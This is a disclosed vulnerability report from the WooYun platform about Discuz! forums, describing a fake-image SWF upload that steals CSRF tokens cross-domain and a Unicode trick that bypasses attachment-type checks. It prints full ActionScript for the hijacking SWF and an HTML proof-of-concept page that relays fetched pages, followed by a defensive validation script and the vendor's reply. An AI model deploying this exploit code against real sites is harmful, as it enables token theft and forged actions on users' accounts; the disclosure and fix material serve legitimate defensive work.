
Vulnerability summary

Defect ID: wooyun-2014-065249

Title: Discuz cross-domain data hijacking + attachment type restriction bypass

Vendor: Discuz!

Author: mramydnei

Submitted: 2014-06-17 14:28

Fixed: 2014-09-15 14:30

Published: 2014-09-15 14:30

Vulnerability type: file upload leading to arbitrary code execution

Severity: Medium

Self-assessed rank: 10

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-06-17: details sent to the vendor, awaiting vendor handling
2014-06-17: vendor confirmed; details disclosed to the vendor only
2014-06-20: details opened to third-party security partners
2014-08-11: details disclosed to core white hats and domain experts
2014-08-21: details disclosed to regular white hats
2014-08-31: details disclosed to intern white hats
2014-09-15: details disclosed to the public

Brief description:

Two issues bundled into one submission.

Detailed description:

#1 Cross-domain data hijacking (stealing the CSRF token, formhash)
The "download remote attachment" feature does not check the file content (file format), so a malicious SWF file can be uploaded while keeping an image extension. Because the SWF is then served from the forum's own origin, it can read forum pages on the user's behalf, which is the cross-domain data hijack:
Code for the fake image CrossDomainDataHijack.jpg:

package com.powerflasher.SampleApp {
    import flash.external.ExternalInterface;
    import flash.display.Sprite;
    import flash.events.Event;
    import flash.net.URLLoader;
    import flash.net.URLRequest;
    import flash.text.TextField;
    import flash.text.TextFieldAutoSize;
    import flash.xml.*;
    import flash.events.IOErrorEvent;
    import flash.events.*;
    import flash.net.*;

    /**
     * @author User
     */
    public class CrossDomainDataHijack extends Sprite {

        private var loader:URLLoader;

        public function CrossDomainDataHijack() {
            loader = new URLLoader();
            configureListeners(loader);
            // The page to fetch is passed in as the "input" FlashVar (the ?input= query
            // parameter on the SWF URL). The SWF is served from the forum's origin, so
            // Flash treats the request as same-origin and returns the response body.
            var target:String = root.loaderInfo.parameters.input;

            var request:URLRequest = new URLRequest(target);
            try {
                loader.load(request);
            } catch (error:Error) {
                sendDatatoJS("Unable to load requested document; Error: " + error.getStackTrace());
            }
        }

        private function configureListeners(dispatcher:IEventDispatcher):void {
            dispatcher.addEventListener(Event.COMPLETE, completeHandler);
            dispatcher.addEventListener(Event.OPEN, openHandler);
            dispatcher.addEventListener(ProgressEvent.PROGRESS, progressHandler);
            dispatcher.addEventListener(SecurityErrorEvent.SECURITY_ERROR, securityErrorHandler);
            dispatcher.addEventListener(HTTPStatusEvent.HTTP_STATUS, httpStatusHandler);
            dispatcher.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHandler);
        }

        // Fired once the whole response has been received; loader.data is the page source.
        private function completeHandler(event:Event):void {
            var loader:URLLoader = URLLoader(event.target);
            //trace("completeHandler: " + loader.data);
            sendDatatoJS("completeHandler: " + loader.data);
        }

        private function openHandler(event:Event):void {
            //trace("openHandler: " + event);
            sendDatatoJS("openHandler: " + event);
        }

        private function progressHandler(event:ProgressEvent):void {
            //trace("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal);
            sendDatatoJS("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal);
        }

        // A security error here is what a correctly isolated origin would produce.
        private function securityErrorHandler(event:SecurityErrorEvent):void {
            //trace("securityErrorHandler: " + event);
            sendDatatoJS("securityErrorHandler: " + event);
        }

        private function httpStatusHandler(event:HTTPStatusEvent):void {
            //trace("httpStatusHandler: " + event);
            sendDatatoJS("httpStatusHandler: " + event);
        }

        private function ioErrorHandler(event:IOErrorEvent):void {
            //trace("ioErrorHandler: " + event);
            sendDatatoJS("ioErrorHandler: " + event);
        }

        // Hands every event (and the fetched data) to the embedding page's
        // JavaScript function sendToJavaScript via ExternalInterface.
        private function sendDatatoJS(data:String):void {
            trace(data);
            ExternalInterface.call("sendToJavaScript", data);
        }
    }
}


Code for the PoC page:

<html>
<head>
<title>steal CSRF tokens by upload a fake image(flash) file on target site</title>
</head>
<body>
<h1 align="center">steal CSRF tokens by upload a fake image(flash) file on target site</h1>
<script>
// Called from the SWF through ExternalInterface; appends each message to the page.
function sendToJavaScript(strData) {
    var theDiv = document.getElementById("HijackedData");
    var content = document.createTextNode(strData);
    theDiv.appendChild(content);
    theDiv.innerHTML += '<br/>';
    //alert(strData);
}

// Rebuilds the <object> so the SWF (with the target page as its ?input= parameter)
// is loaded with AllowScriptAccess=always, which ExternalInterface.call needs.
function refreshObjectTag() {
    var newURL = document.getElementById('flashFile').value + "?input=" + document.getElementById('target').value;

    var newObjectTag = createSwfObject(newURL, {id: 'myObject', width: 100, height: 100, 'AllowScriptAccess': 'always'}, {'AllowScriptAccess': 'always'});
    document.body.removeChild(document.getElementById("myObject"));
    document.body.appendChild(newObjectTag);
}

var createSwfObject = function(src, attributes, parameters) {
    var i, html, div, obj, attr = attributes || {}, param = parameters || {};
    attr.type = 'application/x-shockwave-flash';
    if (window.ActiveXObject) {
        attr.classid = 'clsid:d27cdb6e-ae6d-11cf-96b8-444553540000';
        param.movie = src;
    }
    else {
        attr.data = src;
    }
    html = '<object';
    for (i in attr) {
        html += ' ' + i + '="' + attr[i] + '"';
    }
    html += '>';
    for (i in param) {
        html += '<param name="' + i + '" value="' + param[i] + '" />';
    }
    html += '</object>';
    div = document.createElement('div');
    div.innerHTML = html;
    obj = div.firstChild;
    div.removeChild(obj);
    return obj;
};
</script>
File: <input id="flashFile" size="100" value="http://x55.me/CrossDomainDataHijack.jpg" type="text"> <br>
Page: <input id="target" size="100" value="http://x55.me/csrf.php" type="text"> <br>
<input value="start to steal some CSRF tokens" onclick="refreshObjectTag()" type="button"><br>
<br>
<div id="HijackedData"></div>
<br>
<object id="myObject"></object>
</body>
</html>


Screenshot of the captured formhash:

123.png


#2
The attachment type restriction bypass uses the small trick from "Hacking with Unicode" that I covered last time. I would call this a bug rather than a security vulnerability; at least for now I have not been able to tie it to an actual vulnerability. Fixing it is optional:

123333.png


Test:

12444444.png


Bypass succeeded:

125555555.png


Proof of vulnerability:

Proof as above.

Fix recommendations:

1. Add the file-format check to the remote-attachment loading flow as well.
2. The second issue can be fixed optionally.
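As an added illustration of the two fix items above (this is example code, not Discuz! code; the function names, the image whitelist, the assumed fetcher interface and the sample byte strings are all assumptions), the check below rejects a downloaded remote attachment whose bytes carry a Flash movie header regardless of its .jpg name, and refuses any extension that is not plain ASCII before it is ever compared, which closes the Unicode case-mapping class of trick that issue #2 relies on as a whole rather than one character at a time. The naive_extension_blocked function shows the fragile "lowercase, then compare" pattern that the hardened check replaces.

```python
"""
Added example (not Discuz! code): the server-side content check the fix plan asks for.
Assumed interface: the remote-attachment fetcher hands us the bytes it downloaded and
the filename taken from the URL; the whitelist and signatures below are illustrative.
"""
from typing import Optional, Tuple

# Leading bytes of the image formats the (assumed) attachment whitelist allows.
IMAGE_SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Flash movie headers: uncompressed (FWS), zlib-compressed (CWS), LZMA-compressed (ZWS).
SWF_SIGNATURES = (b"FWS", b"CWS", b"ZWS")
ALLOWED_EXTENSIONS = frozenset(IMAGE_SIGNATURES)


def naive_extension_blocked(filename: str, blocklist=("swf", "php")) -> bool:
    """The fragile pattern: lowercase the extension, then compare against a blocklist.
    U+017F (long s) is already lowercase, so it survives .lower() and misses the list,
    yet any later upper-casing step maps it to 'S'. This is one illustrative member of
    the case-mapping family; the report does not say which character it used."""
    ext = filename.rsplit(".", 1)[-1]
    return ext.lower() in blocklist


def canonical_extension(filename: str) -> Optional[str]:
    """Return the lowercase extension, or None unless it is plain ASCII.
    Rejecting non-ASCII before any case mapping removes the whole family of
    Unicode case-folding look-alikes instead of chasing individual characters."""
    if "." not in filename:
        return None
    ext = filename.rsplit(".", 1)[-1]
    if not ext or not ext.isascii():
        return None
    return ext.lower()


def sniff_format(data: bytes) -> Optional[str]:
    """Identify the container format from its leading bytes; 'swf' for any Flash header."""
    if data[:3] in SWF_SIGNATURES:
        return "swf"
    for ext, sigs in IMAGE_SIGNATURES.items():
        if any(data.startswith(s) for s in sigs):
            return "jpg" if ext == "jpeg" else ext
    return None


def validate_remote_attachment(filename: str, data: bytes) -> Tuple[bool, str]:
    """Accept only when the ASCII extension is whitelisted AND the bytes really are that
    image format. Flash Player picks its handler from the bytes, not the filename, so a
    random name with a .jpg suffix does not stop issue #1; the content check is what does."""
    ext = canonical_extension(filename)
    if ext is None:
        return False, "extension missing or not plain ASCII"
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension .%s not allowed" % ext
    fmt = sniff_format(data)
    if fmt == "swf":
        return False, "content is a Flash movie (FWS/CWS/ZWS header)"
    expected = "jpg" if ext == "jpeg" else ext
    if fmt != expected:
        return False, "content is not a %s image" % expected
    return True, "ok"


# Constructed sample inputs (not real attachments): a zlib-compressed SWF header with a
# dummy body fetched under an image name, and a PNG signature plus IHDR chunk prefix.
FAKE_JPG_SWF = b"CWS\x0a" + b"\x00" * 60
REAL_PNG = b"\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR" + b"\x00" * 20

if __name__ == "__main__":
    for name, blob in (("CrossDomainDataHijack.jpg", FAKE_JPG_SWF),
                       ("photo.png", REAL_PNG),
                       ("photo.\u017fwf", REAL_PNG)):
        print(name, validate_remote_attachment(name, blob))
```

The content sniff is the part that addresses issue #1: the plugin loads whatever bytes are served, so the extension and storage name are irrelevant to it. A complementary measure, independent of this check, is to serve user attachments from a separate origin so that a SWF smuggled through is not same-origin with the forum in the first place.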

Copyright notice: when reposting, credit the source: mramydnei@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 10

Confirmed: 2014-06-17 15:11

Vendor reply:

Thank you for the information. We will confirm and fix it as soon as possible. Issue 2 should not pose any security threat: although the filename check is bypassed, when the uploaded file is actually stored we use a random filename and a fixed extension. Discuz currently does not strictly require that the file extension match the file content; that check is overly complex and of little necessity.

Latest status:

None yet